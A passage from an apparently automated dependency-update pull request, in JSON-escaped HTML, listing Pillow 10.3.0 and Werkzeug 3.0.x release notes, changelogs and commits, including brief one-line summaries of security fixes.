href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e [\u003ca href=\"https://github.com/scaramallion\"\u003e\u003ccode\u003e@​scaramallion\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed joined corners for ImageDraw rounded_rectangle() non-integer dimensions \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7881\"\u003e#7881\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eRemoved Python and NumPy pinning on Cygwin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7880\"\u003e#7880\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUpdate UnidentifiedImageError and \u003cstrong\u003eversion\u003c/strong\u003e imports \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7644\"\u003e#7644\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eStop reading EPS image at EOF marker \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7753\"\u003e#7753\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePSD layer co-ordinates may be negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7706\"\u003e#7706\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse subprocess with CREATE_NO_WINDOW flag in ImageShow WindowsViewer \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7791\"\u003e#7791\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eWhen saving GIF frame that restores to background color, do not fill identical pixels \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7788\"\u003e#7788\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed reading PNG iCCP compression method \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7823\"\u003e#7823\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eAllow writing IFDRational to UNDEFINED tag \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7840\"\u003e#7840\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix logged tag name when loading Exif data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7842\"\u003e#7842\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse maximum frame size in IHDR chunk when saving APNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7821\"\u003e#7821\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ePrevent opening P TGA images without a palette \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7797\"\u003e#7797\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse palette when loading ICO images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7798\"\u003e#7798\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eUse consistent arguments for load_read and load_seek \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7713\"\u003e#7713\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eTurn off nullability warnings for macOS SDK \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7827\"\u003e#7827\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFix shift-sign issue in Convert.c \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7838\"\u003e#7838\u003c/a\u003e [\u003ca href=\"https://github.com/r-barnes\"\u003e\u003ccode\u003e@​r-barnes\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003ewinbuild: Refactor dependency versions into constants \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7843\"\u003e#7843\u003c/a\u003e [\u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eBuild macOS arm64 wheels natively \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7852\"\u003e#7852\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eFixed typo \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7855\"\u003e#7855\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eOpen 16-bit grayscale PNGs as I;16 \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7849\"\u003e#7849\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eHandle truncated chunks at the end of PNG images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7709\"\u003e#7709\u003c/a\u003e [\u003ca href=\"https://github.com/lajiyuan\"\u003e\u003ccode\u003e@​lajiyuan\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003cli\u003eMatch mask size to pasted image size in GifImagePlugin \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7779\"\u003e#7779\u003c/a\u003e [\u003ca href=\"https://github.com/radarhere\"\u003e\u003ccode\u003e@​radarhere\u003c/code\u003e\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-pillow/Pillow/blob/main/CHANGES.rst\"\u003epillow's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e10.3.0 (2024-04-01)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eCVE-2024-28219: Use \u003ccode\u003estrncpy\u003c/code\u003e to avoid buffer overflow \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDeprecate \u003ccode\u003eeval()\u003c/code\u003e, replacing it with \u003ccode\u003elambda_eval()\u003c/code\u003e and \u003ccode\u003eunsafe_eval()\u003c/code\u003e \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e\n[radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise \u003ccode\u003eValueError\u003c/code\u003e if seeking to greater than offset-sized integer in TIFF \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7883\"\u003e#7883\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd \u003ccode\u003e--report\u003c/code\u003e argument to \u003ccode\u003e__main__.py\u003c/code\u003e to omit supported formats \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7818\"\u003e#7818\u003c/a\u003e\n[nulano, radarhere, hugovk]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded RGB to I;16, I;16L, I;16B and I;16N conversion \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7918\"\u003e#7918\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7920\"\u003e#7920\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix editable installation with custom build backend and configuration options \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7658\"\u003e#7658\u003c/a\u003e\n[nulano, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eFix putdata() for I;16N on big-endian \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7209\"\u003e#7209\u003c/a\u003e\n[Yay295, hugovk, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDetermine MPO size from markers, not EXIF data \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7884\"\u003e#7884\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eImproved conversion from RGB to RGBa, LA and La \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7888\"\u003e#7888\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport FITS images with GZIP_1 compression \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7894\"\u003e#7894\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eUse I;16 mode for 9-bit JPEG 2000 images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7900\"\u003e#7900\u003c/a\u003e\n[scaramallion, radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError if kmeans is negative \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7891\"\u003e#7891\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRemove TIFF tag OSUBFILETYPE when saving using libtiff \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7893\"\u003e#7893\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eRaise ValueError for negative values when loading P1-P3 PPM images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7882\"\u003e#7882\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded reading of JPEG2000 palettes \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7870\"\u003e#7870\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdded alpha_quality argument when saving WebP images \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7872\"\u003e#7872\u003c/a\u003e\n[radarhere]\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5c89d88eee199ba53f64581ea39b6a1bc52feb1a\"\u003e\u003ccode\u003e5c89d88\u003c/code\u003e\u003c/a\u003e 10.3.0 version bump\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/63cbfcfdea2d163ec93bae8d283fcfe4b73b5dc7\"\u003e\u003ccode\u003e63cbfcf\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2776126aa9af322b416eaca247f4f8ebefd08128\"\u003e\u003ccode\u003e2776126\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7928\"\u003e#7928\u003c/a\u003e from python-pillow/lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/aeb51cbb169eb3285818ba1390ddf2771d897e6e\"\u003e\u003ccode\u003eaeb51cb\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into lcms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/5beb0b66648db8b542bb5260eed79b25e33d643b\"\u003e\u003ccode\u003e5beb0b6\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/cac6ffa7b399ea79b6239984d1307056a0b19af2\"\u003e\u003ccode\u003ecac6ffa\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-pillow/Pillow/issues/7927\"\u003e#7927\u003c/a\u003e from python-pillow/imagemath\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/f5eeeacf7539eaa0d93a677d7666bc7c142c8d1c\"\u003e\u003ccode\u003ef5eeeac\u003c/code\u003e\u003c/a\u003e Name as 'options' in lambda_eval and unsafe_eval, but '_dict' in deprecated eval\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/facf3af93dabcbdd8cdbda8c3b50eefafa3bb04c\"\u003e\u003ccode\u003efacf3af\u003c/code\u003e\u003c/a\u003e Added release notes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/2a93aba5cfcf6e241ab4f9392c13e3b74032c061\"\u003e\u003ccode\u003e2a93aba\u003c/code\u003e\u003c/a\u003e Use strncpy to avoid buffer overflow\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-pillow/Pillow/commit/a670597bc30e9d489656fc9d807170b8f3d7ca57\"\u003e\u003ccode\u003ea670597\u003c/code\u003e\u003c/a\u003e Update CHANGES.rst [ci skip]\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-pillow/Pillow/compare/1.7.7...10.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `werkzeug` from 0.8.3 to 3.0.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/werkzeug/releases\"\u003ewerkzeug's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.0.6\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.6 security fix release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.6/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-6\"\u003ehttps://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix how \u003ccode\u003emax_form_memory_size\u003c/code\u003e is applied when parsing large non-file fields. \u003ca href=\"https://github.com/advisories/GHSA-q34m-jh98-gwm2\"\u003eGHSA-q34m-jh98-gwm2\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esafe_join\u003c/code\u003e catches certain paths on Windows that were not caught by \u003ccode\u003entpath.isabs\u003c/code\u003e on Python \u0026lt; 3.11. \u003ca href=\"https://github.com/advisories/GHSA-f9vj-2wh5-fj8j\"\u003eGHSA-f9vj-2wh5-fj8j\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.5\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.5 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.5/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-5\"\u003ehttps://werkzeug.palletsprojects.com/en/stable/changes/#version-3-0-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/werkzeug/milestone/37?closed=1\"\u003ehttps://github.com/pallets/werkzeug/milestone/37?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe Watchdog reloader ignores file closed no write events. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2945\"\u003e#2945\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLogging works with client addresses containing an IPv6 scope. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2952\"\u003e#2952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIgnore invalid authorization parameters. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2955\"\u003e#2955\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove type annotation fore \u003ccode\u003eSharedDataMiddleware\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2958\"\u003e#2958\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCompatibility with Python 3.13 when generating debugger pin and the current UID does not have an associated name. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2957\"\u003e#2957\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.4\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.4 fix release, which fixes bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.4/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-4\"\u003ehttps://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-4\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/werkzeug/milestone/36?closed=1\"\u003ehttps://github.com/pallets/werkzeug/milestone/36?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestore behavior where parsing \u003ccode\u003emultipart/x-www-form-urlencoded\u003c/code\u003e data with\ninvalid UTF-8 bytes in the body results in no form data parsed rather than a\n413 error. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2930\"\u003e#2930\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove \u003ccode\u003eparse_options_header\u003c/code\u003e performance when parsing unterminated\nquoted string values. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2904\"\u003e#2904\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth is synchronized across threads/processes when tracking\nfailed entries. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2916\"\u003e#2916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDev server handles unexpected \u003ccode\u003eSSLEOFError\u003c/code\u003e due to issue in Python \u0026lt; 3.13.\n\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2926\"\u003e#2926\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth works when the URL already contains a query string.\n\u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2918\"\u003e#2918\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.3\u003c/h2\u003e\n\u003cp\u003eThis is the Werkzeug 3.0.3 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Werkzeug/3.0.3/\"\u003ehttps://pypi.org/project/Werkzeug/3.0.3/\u003c/a\u003e\nChanges: \u003ca href=\"https://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3\"\u003ehttps://werkzeug.palletsprojects.com/en/3.0.x/changes/#version-3-0-3\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/werkzeug/milestone/35?closed=1\"\u003ehttps://github.com/pallets/werkzeug/milestone/35?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eOnly allow \u003ccode\u003elocalhost\u003c/code\u003e, \u003ccode\u003e.localhost\u003c/code\u003e, \u003ccode\u003e127.0.0.1\u003c/code\u003e, or the specified hostname when running the dev server, to make debugger requests. Additional hosts can be added by using the debugger middleware directly. The debugger UI makes requests using the full URL rather than only the path. GHSA-2g68-c3qc-8985\u003c/li\u003e\n\u003cli\u003eMake reloader more robust when \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e is in \u003ccode\u003esys.path\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/werkzeug/issues/2823\"\u003e#2823\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/werkzeug/blob/main/CHANGES.rst\"\u003ewerkzeug's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.0.6\u003c/h2\u003e\n\u003cp\u003eReleased 2024-10-25\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix how \u003ccode\u003emax_form_memory_size\u003c/code\u003e is applied when parsing large non-file\nfields. :ghsa:\u003ccode\u003eq34m-jh98-gwm2\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003esafe_join\u003c/code\u003e catches certain paths on Windows that were not caught by\n\u003ccode\u003entpath.isabs\u003c/code\u003e on Python \u0026lt; 3.11. :ghsa:\u003ccode\u003ef9vj-2wh5-fj8j\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.0.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-10-24\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe Watchdog reloader ignores file closed no write events. :issue:\u003ccode\u003e2945\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eLogging works with client addresses containing an IPv6 scope :issue:\u003ccode\u003e2952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eIgnore invalid authorization parameters. :issue:\u003ccode\u003e2955\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove type annotation fore \u003ccode\u003eSharedDataMiddleware\u003c/code\u003e. :issue:\u003ccode\u003e2958\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCompatibility with Python 3.13 when generating debugger pin and the current\nUID does not have an associated name. :issue:\u003ccode\u003e2957\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.0.4\u003c/h2\u003e\n\u003cp\u003eReleased 2024-08-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eRestore behavior where parsing \u003ccode\u003emultipart/x-www-form-urlencoded\u003c/code\u003e data with\ninvalid UTF-8 bytes in the body results in no form data parsed rather than a\n413 error. :issue:\u003ccode\u003e2930\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove \u003ccode\u003eparse_options_header\u003c/code\u003e performance when parsing unterminated\nquoted string values. :issue:\u003ccode\u003e2904\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth is synchronized across threads/processes when tracking\nfailed entries. :issue:\u003ccode\u003e2916\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDev server handles unexpected \u003ccode\u003eSSLEOFError\u003c/code\u003e due to issue in Python \u0026lt; 3.13.\n:issue:\u003ccode\u003e2926\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDebugger pin auth works when the URL already contains a query string.\n:issue:\u003ccode\u003e2918\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.0.3\u003c/h2\u003e\n\u003cp\u003eReleased 2024-05-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eOnly allow \u003ccode\u003elocalhost\u003c/code\u003e, \u003ccode\u003e.localhost\u003c/code\u003e, \u003ccode\u003e127.0.0.1\u003c/code\u003e, or the specified\nhostname when running the dev server, to make debugger requests. Additional\nhosts can be added by using the debugger middleware directly. The debugger\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/5eaefc3996aa5cc8c5237d8b82f1b89eed6ea624\"\u003e\u003ccode\u003e5eaefc3\u003c/code\u003e\u003c/a\u003e release version 3.0.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/2767bcb10a7dd1c297d812cc5e6d11a474c1f092\"\u003e\u003ccode\u003e2767bcb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/werkzeug/commit/87cc78a25f782f8c59fbde786840a00cf0d09b3d\"\u003e\u003ccode\u003e87cc78a\u003c/code\u003e\u003c/a\u003e catch special absolute path on Windows Python \u0026lt; 